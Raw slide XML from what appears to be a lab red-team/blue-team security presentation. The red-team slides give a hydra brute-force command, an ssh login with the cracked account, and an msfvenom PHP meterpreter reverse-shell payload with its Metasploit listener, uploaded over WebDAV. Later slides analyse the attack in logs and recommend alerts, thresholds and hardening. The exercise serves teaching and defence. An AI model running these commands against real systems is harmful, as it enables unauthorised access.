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en Beauli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69DC15-854B-4F02-B7BB-668EF089523C}">
  <a:tblStyle styleId="{3B69DC15-854B-4F02-B7BB-668EF08952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06T22:44:16.804">
    <p:pos x="6000" y="0"/>
    <p:text>I really like the MITRE references. Don't forget about the OWASP top 10 as well.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c1fb9b1e7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c1fb9b1e7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c098940b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c098940b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5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1.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60.png"/><Relationship Id="rId7"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4.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78.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.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93.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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId9"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1.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1.png"/><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7.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1.png"/><Relationship Id="rId4"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192.168.1.105" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId5"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Forcing the Weak Password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;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1" name="Google Shape;1121;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br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>With the information gained from the Directory Listing vulnerability, we can brute force the secret_folder using Ashton’s username. </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is used for our brute force. </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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3" name="Google Shape;1123;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1124" name="Google Shape;112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5" name="Google Shape;112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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1127" name="Google Shape;112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8" name="Google Shape;112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With the password, we are able to gain access to the secret_folder containing credentials for another user Ryan, as well as instructions on how to access and use WebDAV.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We can also gain shell access due to the SSH port being open.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1132" name="Google Shape;113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3" name="Google Shape;113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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="14813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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481375"/>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hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</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ssh ashton@192.168.1.105</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328950" y="3859090"/>
            <a:ext cx="4500724" cy="75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PHP Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Google Shape;114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3" name="Google Shape;1143;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From our nmap scan, and the information learned from the secret_folder, we know the company is using WebDAV as a file sharing server. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>With Ryan’s credentials, we can exploit WebDAV, by create a PHP payload to give us a reverse shell. This is done with </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to create our payload, and metasploit (msfconsole) to setup a listener.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1146" name="Google Shape;114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7" name="Google Shape;114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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1149" name="Google Shape;1149;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0" name="Google Shape;1150;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By doing this, when the PHP shell script runs, we gain shell access via the listener. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6021195" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1154" name="Google Shape;1154;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5" name="Google Shape;1155;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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6267975" y="1481325"/>
            <a:ext cx="25617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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6193596" y="1481375"/>
            <a:ext cx="2709000" cy="3067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msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.90 LPORT=6666 -f raw &gt; shell.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr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use multi/handler</a:t>
            </a:r>
            <a:endParaRPr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set payload php/meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set LHOST 192.168.1.90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>et LPORT 6666</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>un</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:b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3" name="Google Shape;1163;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4" name="Google Shape;1164;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70" name="Google Shape;1170;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1" name="Google Shape;1171;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="4146725"/>
            <a:ext cx="5860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port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> Mar 3rd, 2021 around 20:32UTC</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>There were 29,461 packets sent, during the port scan. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416625" y="4229687"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="136125" y="912225"/>
            <a:ext cx="8803426" cy="2269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79" name="Google Shape;117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0" name="Google Shape;1180;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="190371" y="860750"/>
            <a:ext cx="8763260" cy="2988726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734574" y="4148325"/>
            <a:ext cx="7711500" cy="554100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:sp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Doing a search for </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>*nmap*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>user_agent.original: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>indicates that there was nmap/port scan activity in the same time frame.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416625" y="4233287"/>
            <a:ext cx="424701" cy="33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8" name="Google Shape;1188;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734575" y="4148325"/>
            <a:ext cx="80706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request for the hidden directory happens around March 3, 2021 @ 20:39:46. There were 6 hits/requests.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file inside contained plain text credentials for Ryan and instructions on how to use WebDAV</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416625" y="4233287"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;1190;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="122850" y="870775"/>
            <a:ext cx="8839202" cy="3092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6" name="Google Shape;119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7" name="Google Shape;1197;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="241759" y="819438"/>
            <a:ext cx="8660484" cy="3043151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734575" y="3919725"/>
            <a:ext cx="80706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16,046 requests were made in the attack.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16,045 requests were made before the password was discovered.</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416625" y="4233287"/>
            <a:ext cx="424701" cy="33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5" name="Google Shape;120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6" name="Google Shape;1206;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734575" y="4072125"/>
            <a:ext cx="80706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There were 56 requests/hits to this directory.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This is where the shell.php is uploaded and accessed.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="416625" y="4233287"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="838500"/>
            <a:ext cx="8839200" cy="30716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7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4" name="Google Shape;1214;p71"/>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5" name="Google Shape;1215;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21" name="Google Shape;122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72"/>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Setting up an alert of any port being scanned would help with monitoring. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>A low-level alert with a threshold of 50 within a minute, to a critical-level alert with a threshold of 2000 per minute would work in this case.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During this testing, there was 29,000 packets being sent within a two-minute timeframe. </a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;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Enable only logical network accessible ports that the company requires, and ensure only approved ports, protocols and services are running. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Perform regular automated port scans on a regular basis against all systems and alert if unauthorized ports are detected. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Apply host-based firewalls or port filter tools on end systems, with a default-deny rule that drops all traffic except those services and ports that are allowed.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9" name="Google Shape;122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Setup an alert for any unauthorized request for </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>/secret_folder.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A low-level alert for 5 attempts, and a critical-level alert for 15 attempts or more.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Looking for the unauthorized requests, there was an abnormally high amount of hits, which should not be the case if it’s hidden. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;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Encrypt data contained within the confidential folders. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Whitelist IP address to limit access only to trusted users or blacklist IPs with failed attempts more than 15.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1300"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>Setup a time out of 15 minutes for more than 3 failed password attempts.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Increase password strength requirements for the directory, and update policy required to change password every 3 months. </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7" name="Google Shape;1237;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Setup an alert for any unauthorized requests </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
